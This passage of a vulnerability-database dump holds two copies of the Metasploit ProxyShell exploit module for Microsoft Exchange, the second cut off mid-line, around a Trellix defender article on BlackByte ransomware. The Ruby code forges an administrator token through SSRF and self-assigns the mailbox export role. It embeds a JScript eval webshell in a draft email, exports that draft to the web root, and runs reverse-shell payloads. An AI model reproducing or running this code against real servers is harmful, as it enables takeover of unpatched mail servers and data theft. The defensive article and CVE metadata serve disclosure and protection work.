Faker::Internet.email\n print_status('Attempt to exploit for CVE-2021-34473')\n run_cve_2021_34473\n\n powershell_probe = send_http('GET', \"/PowerShell/?X-Rps-CAT=#{@common_access_token}&Email=Autodiscover/autodiscover.json?a=#{@ssrf_email}\", cookie: :none)\n fail_with(Failure::UnexpectedReply, 'Failed to access the PowerShell backend') unless powershell_probe&.code == 200\n\n print_status('Assigning the \\'Mailbox Import Export\\' role')\n execute_powershell('New-ManagementRoleAssignment', args: [ { name: '-Role', value: 'Mailbox Import Export' }, { name: '-User', value: datastore['EMAIL'] } ])\n\n @shell_filename = \"#{rand_text_alphanumeric(8..12)}.aspx\"\n if datastore['UseAlternatePath']\n unc_path = \"#{datastore['IISBasePath'].split(':')[1]}\\\\#{datastore['IISWritePath']}\"\n unc_path = \"\\\\\\\\\\\\\\\\#{@backend_server_name}\\\\#{datastore['IISBasePath'].split(':')[0]}$#{unc_path}\\\\#{@shell_filename}\"\n else\n unc_path = \"#{datastore['ExchangeBasePath'].split(':')[1]}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\"\n unc_path = \"\\\\\\\\\\\\\\\\#{@backend_server_name}\\\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{unc_path}\\\\#{@shell_filename}\"\n end\n\n normal_path = unc_path.gsub(/^\\\\+127\\.0\\.0\\.1\\\\(.)\\$\\\\/, '\\1:\\\\')\n print_status(\"Writing to: #{normal_path}\")\n register_file_for_cleanup(normal_path)\n\n @export_name = rand_text_alphanumeric(8..12)\n execute_powershell('New-MailboxExportRequest', args: [\n { name: '-Name', value: @export_name },\n { name: '-Mailbox', value: datastore['EMAIL'] },\n { name: '-IncludeFolders', value: '#Drafts#' },\n { name: '-ContentFilter', value: \"(Subject -eq '#{@draft_subject}')\" },\n { name: '-ExcludeDumpster' },\n { name: '-FilePath', value: unc_path }\n ])\n\n print_status('Waiting for the export request to complete...')\n 30.times do\n if execute_command('whoami')&.code == 200\n print_good('The mailbox export request has completed')\n break\n end\n sleep 5\n end\n\n print_status('Triggering the payload')\n case target['Type']\n when :windows_command\n vprint_status(\"Generated payload: #{payload.encoded}\")\n\n if !cmd_windows_generic?\n execute_command(payload.encoded)\n else\n boundary = rand_text_alphanumeric(8..12)\n response = execute_command(\"cmd /c echo START#{boundary}&#{payload.encoded}&echo END#{boundary}\")\n\n print_warning('Dumping command output in response')\n if response.body =~ /START#{boundary}(.*)END#{boundary}/m\n print_line(Regexp.last_match(1).strip)\n else\n print_error('Empty response, no command output')\n end\n end\n when :windows_dropper\n execute_command(generate_cmdstager(concat_operator: ';').join)\n when :windows_powershell\n cmd = cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true)\n execute_command(cmd)\n end\n end\n\n def cleanup\n super\n return unless @common_access_token && @export_name\n\n print_status('Removing the mailbox export request')\n execute_powershell('Remove-MailboxExportRequest', args: [\n { name: '-Identity', value: \"#{datastore['EMAIL']}\\\\#{@export_name}\" },\n { name: '-Confirm', value: false }\n ])\n end\n\n def execute_command(cmd, _opts = {})\n if !cmd_windows_generic?\n cmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\"));\"\n else\n cmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\").StdOut.ReadAll());\"\n end\n\n send_request_raw(\n 'method' => 'POST',\n 'uri' => normalize_uri(web_directory, @shell_filename),\n 'ctype' => 'application/x-www-form-urlencoded',\n 'data' => \"#{@shell_input_name}=#{cmd}\"\n )\n end\nend\n\nclass PstEncoding\n ENCODE_TABLE = [\n 71, 241, 180, 230, 11, 106, 114, 72,\n 133, 78, 158, 235, 226, 248, 148, 83,\n 224, 187, 160, 2, 232, 90, 9, 171,\n 219, 227, 186, 198, 124, 195, 16, 221,\n 57, 5, 150, 48, 245, 55, 96, 130,\n 140, 201, 19, 74, 107, 29, 243, 251,\n 143, 38, 151, 202, 145, 23, 1, 196,\n 50, 45, 110, 49, 149, 255, 217, 35,\n 209, 0, 94, 121, 220, 68, 59, 26,\n 40, 197, 97, 87, 32, 144, 61, 131,\n 185, 67, 190, 103, 210, 70, 66, 118,\n 192, 109, 91, 126, 178, 15, 22, 41,\n 60, 169, 3, 84, 13, 218, 93, 223,\n 246, 183, 199, 98, 205, 141, 6, 211,\n 105, 92, 134, 214, 20, 247, 165, 102,\n 117, 172, 177, 233, 69, 33, 112, 12,\n 135, 159, 116, 164, 34, 76, 111, 191,\n 31, 86, 170, 46, 179, 120, 51, 80,\n 176, 163, 146, 188, 207, 25, 28, 167,\n 99, 203, 30, 77, 62, 75, 27, 155,\n 79, 231, 240, 238, 173, 58, 181, 89,\n 4, 234, 64, 85, 37, 81, 229, 122,\n 137, 56, 104, 82, 123, 252, 39, 174,\n 215, 189, 250, 7, 244, 204, 142, 95,\n 239, 53, 156, 132, 43, 21, 213, 119,\n 52, 73, 182, 18, 10, 127, 113, 136,\n 253, 157, 24, 65, 125, 147, 216, 88,\n 44, 206, 254, 36, 175, 222, 184, 54,\n 200, 161, 128, 166, 153, 152, 168, 47,\n 14, 129, 101, 115, 228, 194, 162, 138,\n 212, 225, 17, 208, 8, 139, 42, 242,\n 237, 154, 100, 63, 193, 108, 249, 236\n ].freeze\n\n def self.encode(data)\n encoded = ''\n data.each_char do |char|\n encoded << ENCODE_TABLE[char.ord].chr\n end\n encoded\n end\nend\n\nclass XMLTemplate\n def self.render(template_name, context = nil)\n file_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'proxyshell', \"#{template_name}.xml.erb\")\n template = ::File.binread(file_path)\n case context\n when Hash\n b = binding\n locals = context.collect { |k, _| \"#{k} = context[#{k.inspect}]; \" }\n b.eval(locals.join)\n else\n raise ArgumentError\n end\n b.eval(Erubi::Engine.new(template).src)\n end\nend\n\nclass SSRFWinRMConnection < WinRM::Connection\n class MessageFactory < WinRM::PSRP::MessageFactory\n def self.create_pipeline_message(runspace_pool_id, pipeline_id, command)\n WinRM::PSRP::Message.new(\n runspace_pool_id,\n WinRM::PSRP::Message::MESSAGE_TYPES[:create_pipeline],\n XMLTemplate.render('create_pipeline', cmdlet: command[:cmdlet], args: command[:args]),\n pipeline_id\n )\n end\n end\n\n # we have to define this class so we can define our own transport factory that provides one backed by the SSRF\n # vulnerability\n class TransportFactory < WinRM::HTTP::TransportFactory\n class HttpSsrf < WinRM::HTTP::HttpTransport\n # rubocop:disable Lint/\n def initialize(endpoint, options)\n @endpoint = endpoint.is_a?(String) ? URI.parse(endpoint) : endpoint\n @ssrf_proc = options[:ssrf_proc]\n end\n\n def send_request(message)\n resp = @ssrf_proc.call('POST', @endpoint.path, { ctype: 'application/soap+xml;charset=UTF-8', data: message })\n WinRM::ResponseHandler.new(resp.body, resp.code).parse_to_xml\n end\n end\n\n def create_transport(connection_opts)\n raise NotImplementedError unless connection_opts[:transport] == :ssrf\n\n super\n end\n\n private\n\n def init_ssrf_transport(opts)\n HttpSsrf.new(opts[:endpoint], opts)\n end\n end\n\n module PowerShell\n def send_command(command, _arguments)\n command_id = SecureRandom.uuid.to_s.upcase\n message = MessageFactory.create_pipeline_message(@runspace_id, command_id, command)\n fragmenter.fragment(message) do |fragment|\n command_args = [connection_opts, shell_id, command_id, fragment]\n if fragment.start_fragment\n resp_doc = transport.send_request(WinRM::WSMV::CreatePipeline.new(*command_args).build)\n command_id = REXML::XPath.first(resp_doc, \"//*[local-name() = 'CommandId']\").text\n else\n transport.send_request(WinRM::WSMV::SendData.new(*command_args).build)\n end\n end\n\n command_id\n end\n end\n\n def initialize(connection_opts)\n # these have to be set to truthy values to pass the option validation, but they're not actually used because hax\n connection_opts.merge!({ user: :ssrf, password: :ssrf })\n super(connection_opts)\n end\n\n def transport\n @transport ||= begin\n transport_factory = TransportFactory.new\n transport_factory.create_transport(@connection_opts)\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/36667", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "trellix": [{"lastseen": "2022-02-28T00:00:00", "description": "\n\n# Trellix Global Defenders: Analysis and Protections for BlackByte Ransomware\n\nBy Taylor Mullins \u00b7 February 28, 2022\n\nBlackByte Ransomware has been in the news of late due to a successful attack against a National Football League (NFL) Franchise and a Joint Cybersecurity Advisory by the Federal Bureau of Investigation (FBI) and the U.S. Secret Service (USSS) warning on breaches to the networks of at least three organizations from US critical infrastructure sectors in the last three months. BlackByte Ransomware is currently being offered to threat actors as a Ransomware-as-a-Service (RaaS) and makes use of PowerShell and Windows CLI commands to carry out various tasks such as network discovery, task scheduling and to create and disable Windows and security services.\n\nBlackByte Ransomware makes files inaccessible by encrypting them and generates a ransom note (the \"BlackByte_restoremyfiles.hta\" file) that contains instructions on how to contact the attackers for data decryption and other details. Also, BlackByte appends the \".blackbyte\" extension to the names of encrypted files. BlackByte does have worming capabilities and can infect additional endpoints on the same network.\n\n **Figure 1. MITRE ATT&CK Framework for BlackByte Ransomware**\n\n## Recommended Steps to Prevent Initial Access \n\nThe Joint Cybersecurity Advisory provides several recommendations to secure your environment against BlackByte that were gathered from their analysis of malware samples discovered in the wild.\n\n * BlackByte operators have been observed exploiting the following CVEs to gain initial access, patching is recommended to prevent exploitation.\n * [CVE-2021-34473](<https://vulners.com/cve/CVE-2021-34473>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability\n * [CVE-2021-34523](<https://vulners.com/cve/CVE-2021-34523>) \\- Microsoft Exchange Server Elevation of Privilege Vulnerability\n * [CVE-2021-31207](<https://vulners.com/cve/CVE-2021-31207>) \\- Microsoft Exchange Server Security Feature Bypass Vulnerability\n * Blocking IP Addresses known to download additional payloads in BlackByte attacks prior to encryption: **185.93.6.31** and **45.9.148.114.**\n * Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs for any unusual activity.\n * After gaining access to the service accounts some adversaries have utilized AnyDesk for lateral movement, monitoring for AnyDesk activity can be an early indicator of compromise if AnyDesk is not utilized or allowed by your organization.\n * Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.\n * Disable hyperlinks in received emails.\n\n[Joint Cybersecurity Advisory: Indicators of Compromise Associated with BlackByte Ransomware](<https://www.ic3.gov/Media/News/2022/220211.pdf>)\n\n## Trellix Protections and Global Detections\n\nTrellix Global Threat Intelligence is currently detecting all known analyzed indicators for this campaign.\n\n **Figure 2. Trellix Products detecting this threat globally. Source: MVISION Insights**\n\n## Blocking BlackByte Attacks with Endpoint Security\n\nTrellix ENS is currently detecting BlackByte Indicators of Compromise (IOCs) from the standpoint of signature detections and the malware behavior associated with BlackByte Ransomware attacks. The following Exploit Prevention Rule in ENS has shown success in stopping BlackByte samples due to BlackByte being Script-based. Trellix always recommends testing in Report Only Mode before blocking to confirm no false positives are being detected by this signature rule.\n\n### Exploit Prevention Signature ID 6207: ASR : File Download attempt by Scripts\n\n **Figure 3. Exploit Prevention Rule in ePolicy Orchestrator/MVISION ePO**  **Figure 4. MVISION EDR noting where Endpoint Protection (ENS) could have stopped specific techniques**  **Figure 5. Ransomware Detection Name and Observed Detections noted in MVISION Insights**\n\n## BlackByte Threat Intelligence from the Trellix Advanced Threat Research Team and MVISION Insights\n\nMVISION Insights will provide the current threat intelligence and known indicators for BlackByte Ransomware. MVISION Insights will alert to detections and Process Traces that have been observed and systems that require additional attention to prevent widespread infection. MVISION Insights will also include Hunting Rules for threat hunting and further intelligence gathering of the threat activity and adversary.\n\n### MVISION Insights Campaign Names: Cybersecurity Advisory - BlackByte Ransomware and JavaScript Malware Threat Landscape\n\n **Figure 6. Campaign Details, Analyzed Indicators of Compromise, and Detections**  **Figure 7. Hunting Rules for BlackByte Ransomware in MVISION Insights**\n\n## Detecting Malicious Activity with MVISION EDR\n\nMVISION EDR is currently monitoring for the activity associated with BlackByte Ransomware and will note the MITRE techniques and any suspicious indicators related to the adversarial activity. Several of the techniques outlined in the Joint Advisory that are observed with BlackByte are noted below, monitoring for this type of activity can point to activity associated with the Tactics, techniques, and procedures (TTPs) for BlackByte.\n\n **Figure 8. Network Connection to Known Malicious IP Address Associated with BlackByte**  **Figure 9. Enabling of remote registry for possible preparation of Lateral Movement**  **Figure 10. Deletion of Shadow Copy to inhibit system recovery**\n\nTrellix offers Threat Intelligence Briefings along with Cloud Security and Data Protection workshops to provide customers with best practice recommendations on how to utilize their existing security controls to protect against adversarial and insider threats, please reach out if you would like to schedule a workshop with your organization.\n", "cvss3": {}, "published": "2022-02-28T00:00:00", "type": "trellix", "title": "Trellix Global Defenders: Analysis and Protections for BlackByte Ransomware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-02-28T00:00:00", "id": "TRELLIX:21227249912602DD6E11D3B19898A7FF", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/trellix-global-defenders-analysis-and-protections-for-blackbyte-ransomware.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "metasploit": [{"lastseen": "2023-08-07T01:57:48", "description": "This module exploits a vulnerability on Microsoft Exchange Server that allows an attacker to bypass the authentication (CVE-2021-31207), impersonate an arbitrary user (CVE-2021-34523) and write an arbitrary file (CVE-2021-34473) to achieve the RCE (Remote Code Execution). By taking advantage of this vulnerability, you can execute arbitrary commands on the remote Microsoft Exchange Server. This vulnerability affects Exchange 2013 CU23 < 15.0.1497.15, Exchange 2016 CU19 < 15.1.2176.12, Exchange 2016 CU20 < 15.1.2242.5, Exchange 2019 CU8 < 15.2.792.13, Exchange 2019 CU9 < 15.2.858.9. All components are vulnerable by default.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-18T14:50:34", "type": "metasploit", "title": "Microsoft Exchange ProxyShell RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-12-02T20:58:50", "id": "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYSHELL_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxyshell_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Powershell\n include Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyShell RCE',\n 'Description' => %q{\n This module exploits a vulnerability on Microsoft Exchange Server that\n allows an attacker to bypass the authentication (CVE-2021-31207), impersonate an\n arbitrary user (CVE-2021-34523) and write an arbitrary file (CVE-2021-34473) to achieve\n the RCE (Remote Code Execution).\n\n By taking advantage of this vulnerability, you can execute arbitrary\n commands on the remote Microsoft Exchange Server.\n\n This vulnerability affects Exchange 2013 CU23 < 15.0.1497.15,\n Exchange 2016 CU19 < 15.1.2176.12, Exchange 2016 CU20 < 15.1.2242.5,\n Exchange 2019 CU8 < 15.2.792.13, Exchange 2019 CU9 < 15.2.858.9.\n\n All components are vulnerable by default.\n },\n 'Author' => [\n 'Orange Tsai', # Discovery\n 'Jang (@testanull)', # Vulnerability analysis\n 'PeterJson', # Vulnerability analysis\n 'brandonshi123', # Vulnerability analysis\n 'mekhalleh (RAMELLA S\u00e9bastien)', # exchange_proxylogon_rce template\n 'Donny Maasland', # Procedure optimizations (email enumeration)\n 'Rich Warren', # Procedure optimizations (email enumeration)\n 'Spencer McIntyre', # Metasploit module\n 'wvu' # Testing\n ],\n 'References' => [\n [ 'CVE', '2021-34473' ],\n [ 'CVE', '2021-34523' ],\n [ 'CVE', '2021-31207' ],\n [ 'URL', 'https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1' ],\n [ 'URL', 'https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf' ],\n [ 'URL', 'https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/' ],\n [ 'URL', 'https://github.com/dmaasland/proxyshell-poc' ]\n ],\n 'DisclosureDate' => '2021-04-06', # pwn2own 2021\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Platform' => ['windows'],\n 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows Powershell',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_powershell,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_dropper,\n 'CmdStagerFlavor' => %i[psh_invokewebrequest],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'CMDSTAGER::FLAVOR' => 'psh_invokewebrequest'\n }\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_CMD],\n 'Type' => :windows_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\n 'AKA' => ['ProxyShell'],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n )\n )\n\n register_options([\n OptString.new('EMAIL', [false, 'A known email address for this organization']),\n OptBool.new('UseAlternatePath', [true, 'Use the IIS root dir as alternate path', false]),\n ])\n\n register_advanced_options([\n OptString.new('BackendServerName', [false, 'Force the name of the backend Exchange server targeted']),\n OptString.new('ExchangeBasePath', [true, 'The base path where exchange is installed', 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15']),\n OptString.new('ExchangeWritePath', [true, 'The path where you want to write the backdoor', 'owa\\\\auth']),\n OptString.new('IISBasePath', [true, 'The base path where IIS wwwroot directory is', 'C:\\\\inetpub\\\\wwwroot']),\n OptString.new('IISWritePath', [true, 'The path where you want to write the backdoor', 'aspnet_client']),\n OptString.new('MapiClientApp', [true, 'This is MAPI client version sent in the request', 'Outlook/15.0.4815.1002'])\n ])\n end\n\n def check\n @ssrf_email ||= Faker::Internet.email\n res = send_http('GET', '/mapi/nspi/')\n return CheckCode::Unknown if res.nil?\n return CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint'\n\n CheckCode::Vulnerable\n end\n\n def cmd_windows_generic?\n datastore['PAYLOAD'] == 'cmd/windows/generic'\n end\n\n def encode_cmd(cmd)\n cmd.gsub!('\\\\', '\\\\\\\\\\\\')\n cmd.gsub('\"', '\\u0022').gsub('&', '\\u0026').gsub('+', '\\u002b')\n end\n\n def random_mapi_id\n id = \"{#{Rex::Text.rand_text_hex(8)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(12)}}\"\n id.upcase\n end\n\n def request_autodiscover(email)\n xmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' }\n\n response = send_http(\n 'POST',\n '/autodiscover/autodiscover.xml',\n data: XMLTemplate.render('soap_autodiscover', email: email),\n ctype: 'text/xml; charset=utf-8'\n )\n\n case response.body\n when %r{<ErrorCode>500</ErrorCode>}\n fail_with(Failure::NotFound, 'No Autodiscover information was found')\n when %r{<Action>redirectAddr</Action>}\n fail_with(Failure::NotFound, 'No email address was found')\n end\n\n xml = Nokogiri::XML.parse(response.body)\n\n legacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content\n fail_with(Failure::NotFound, 'No \\'LegacyDN\\' was found') if legacy_dn.nil? || legacy_dn.empty?\n\n server = ''\n xml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item|\n type = item.at_xpath('./xmlns:Type', xmlns)&.content\n if type == 'EXCH'\n server = item.at_xpath('./xmlns:Server', xmlns)&.content\n end\n end\n fail_with(Failure::NotFound, 'No \\'Server ID\\' was found') if server.nil? || server.empty?\n\n { server: server, legacy_dn: legacy_dn }\n end\n\n def request_fqdn\n ntlm_ssp = \"NTLMSSP\\x00\\x01\\x00\\x00\\x00\\x05\\x02\\x88\\xa0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n received = send_request_raw(\n 'method' => 'RPC_IN_DATA',\n 'uri' => normalize_uri('rpc', 'rpcproxy.dll'),\n 'headers' => {\n 'Authorization' => \"NTLM #{Rex::Text.encode_base64(ntlm_ssp)}\"\n }\n )\n fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received\n\n if received.code == 401 && received['WWW-Authenticate'] && received['WWW-Authenticate'].match(/^NTLM/i)\n hash = received['WWW-Authenticate'].split('NTLM ')[1]\n message = Net::NTLM::Message.parse(Rex::Text.decode_base64(hash))\n dns_server = Net::NTLM::TargetInfo.new(message.target_info).av_pairs[Net::NTLM::TargetInfo::MSV_AV_DNS_COMPUTER_NAME]\n\n return dns_server.force_encoding('UTF-16LE').encode('UTF-8').downcase\n end\n\n fail_with(Failure::NotFound, 'No Backend server was found')\n end\n\n # https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oxcmapihttp/c245390b-b115-46f8-bc71-03dce4a34bff\n def request_mapi(legacy_dn)\n data = \"#{legacy_dn}\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\"\n headers = {\n 'X-RequestType' => 'Connect',\n 'X-ClientInfo' => random_mapi_id,\n 'X-ClientApplication' => datastore['MapiClientApp'],\n 'X-RequestId' => \"#{random_mapi_id}:#{Rex::Text.rand_text_numeric(5)}\"\n }\n\n sid = ''\n response = send_http(\n 'POST',\n '/mapi/emsmdb',\n data: data,\n ctype: 'application/mapi-http',\n headers: headers\n )\n if response&.code == 200\n sid = response.body.match(/S-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*/).to_s\n end\n fail_with(Failure::NotFound, 'No \\'SID\\' was found') if sid.empty?\n\n sid\n end\n\n def get_sid_for_email(email)\n autodiscover = request_autodiscover(email)\n request_mapi(autodiscover[:legacy_dn])\n end\n\n # pre-authentication SSRF (Server Side Request Forgery) + impersonate as admin.\n def exploit_setup\n if datastore['BackendServerName'] && !datastore['BackendServerName'].empty?\n server_name = datastore['BackendServerName']\n print_status(\"Internal server name forced to: #{server_name}\")\n else\n print_status('Retrieving backend FQDN over RPC request')\n server_name = request_fqdn\n print_status(\"Internal server name: #{server_name}\")\n end\n @backend_server_name = server_name\n\n get_common_access_token\n print_good('Successfully assigned the \\'Mailbox Import Export\\' role')\n print_good(\"Proceeding with SID: #{@mailbox_user_sid} (#{@mailbox_user_email})\")\n end\n\n def probe_powershell_backend(common_access_token)\n powershell_probe = send_http('GET', \"/PowerShell/?X-Rps-CAT=#{common_access_token}\")\n fail_with(Failure::UnexpectedReply, 'Failed to access the PowerShell backend') unless powershell_probe&.code == 200\n end\n\n # this function doesn't return unless it's successful\n def get_common_access_token\n # get a SID from the specified email address\n email_address = datastore['EMAIL']\n unless email_address.blank?\n sid = get_sid_for_email(email_address)\n vprint_status(\"SID: #{sid} (#{email_address})\")\n common_access_token = build_token(sid)\n probe_powershell_backend(common_access_token)\n\n print_status(\"Assigning the 'Mailbox Import Export' role via #{email_address}\")\n role_assigned = execute_powershell('New-ManagementRoleAssignment', cat: common_access_token, args: [\n { name: '-Role', value: 'Mailbox Import Export' },\n { name: '-User', value: email_address }\n ])\n unless role_assigned\n fail_with(Failure::BadConfig, 'The specified email address does not have the \\'Mailbox Import Export\\' role and can not self-assign it')\n end\n\n @mailbox_user_sid = sid\n @mailbox_user_email = email_address\n @common_access_token = common_access_token\n return\n end\n\n print_status('Enumerating valid email addresses and searching for one that either has the \\'Mailbox Import Export\\' role or can self-assign it')\n get_emails.each do |this_email_address|\n next if this_email_address == email_address # already tried this one\n\n vprint_status(\"Reattempting to assign the 'Mailbox Import Export' role via #{this_email_address}\")\n begin\n this_sid = get_sid_for_email(this_email_address)\n rescue RuntimeError\n print_error(\"Failed to identify the SID for #{this_email_address}\")\n next\n end\n\n common_access_token = build_token(this_sid)\n role_assigned = execute_powershell('New-ManagementRoleAssignment', cat: common_access_token, args: [\n { name: '-Role', value: 'Mailbox Import Export' },\n { name: '-User', value: this_email_address }\n ])\n next unless role_assigned\n\n @mailbox_user_sid = this_sid\n @mailbox_user_email = this_email_address\n @common_access_token = common_access_token\n return # rubocop:disable Lint/NonLocalExitFromIterator\n end\n\n fail_with(Failure::NoAccess, 'No user with the necessary management role was identified')\n end\n\n def send_http(method, uri, opts = {})\n ssrf = \"Autodiscover/autodiscover.json?a=#{@ssrf_email}\"\n opts[:cookie] = \"Email=#{ssrf}\"\n super(method, \"/#{ssrf}#{uri}\", opts)\n end\n\n def get_emails\n mailbox_table = Rex::Text::Table.new(\n 'Header' => 'Exchange Mailboxes',\n 'Columns' => %w[EmailAddress Name RoutingType MailboxType]\n )\n\n MailboxEnumerator.new(self).each do |row|\n mailbox_table << row\n end\n\n print_status(\"Enumerated #{mailbox_table.rows.length} email addresses\")\n stored_path = store_loot('ad.exchange.mailboxes', 'text/csv', rhost, mailbox_table.to_csv)\n print_status(\"Saved mailbox and email address data to: #{stored_path}\")\n\n mailbox_table.rows.map(&:first)\n end\n\n def create_embedded_draft(user_sid)\n @shell_input_name = rand_text_alphanumeric(8..12)\n @draft_subject = rand_text_alphanumeric(8..12)\n print_status(\"Saving a draft email with subject '#{@draft_subject}' containing the attachment with the embedded webshell\")\n payload = Rex::Text.encode_base64(PstEncoding.encode(\"#<script language=\\\"JScript\\\" runat=\\\"server\\\">function Page_Load(){eval(Request[\\\"#{@shell_input_name}\\\"],\\\"unsafe\\\");}</script>\"))\n file_name = \"#{Faker::Lorem.word}#{%w[- _].sample}#{Faker::Lorem.word}.#{%w[rtf pdf docx xlsx pptx zip].sample}\"\n envelope = XMLTemplate.render('soap_draft', user_sid: user_sid, file_content: payload, file_name: file_name, subject: @draft_subject)\n\n send_http('POST', '/ews/exchange.asmx', data: envelope, ctype: 'text/xml;charset=UTF-8')\n end\n\n def web_directory\n if datastore['UseAlternatePath']\n datastore['IISWritePath'].gsub('\\\\', '/')\n else\n datastore['ExchangeWritePath'].gsub('\\\\', '/')\n end\n end\n\n def build_token(sid)\n uint8_tlv = proc do |type, value|\n type + [value.length].pack('C') + value\n end\n\n token = uint8_tlv.call('V', \"\\x00\")\n token << uint8_tlv.call('T', 'Windows')\n token << \"\\x43\\x00\"\n token << uint8_tlv.call('A', 'Kerberos')\n token << uint8_tlv.call('L', 'Administrator')\n token << uint8_tlv.call('U', sid)\n\n # group data for S-1-5-32-544\n token << \"\\x47\\x01\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x0c\\x53\\x2d\\x31\\x2d\\x35\\x2d\\x33\\x32\\x2d\\x35\\x34\\x34\\x45\\x00\\x00\\x00\\x00\"\n Rex::Text.encode_base64(token)\n end\n\n def exploit\n @ssrf_email ||= Faker::Internet.email\n print_status('Attempt to exploit for CVE-2021-34473')\n exploit_setup\n\n create_embedded_draft(@mailbox_user_sid)\n @shell_filename = \"#{rand_text_alphanumeric(8..12)}.aspx\"\n if datastore['UseAlternatePath']\n unc_path = \"#{datastore['IISBasePath'].split(':')[1]}\\\\#{datastore['IISWritePath']}\"\n unc_path = \"\\\\\\\\\\\\\\\\#{@backend_server_name}\\\\#{datastore['IISBasePath'].split(':')[0]}$#{unc_path}\\\\#{@shell_filename}\"\n else\n unc_path = \"#{datastore['ExchangeBasePath'].split(':')[1]}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\"\n unc_path = \"\\\\\\\\\\\\\\\\#{@backend_server_name}\\\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{unc_path}\\\\#{@shell_filename}\"\n end\n\n normal_path = 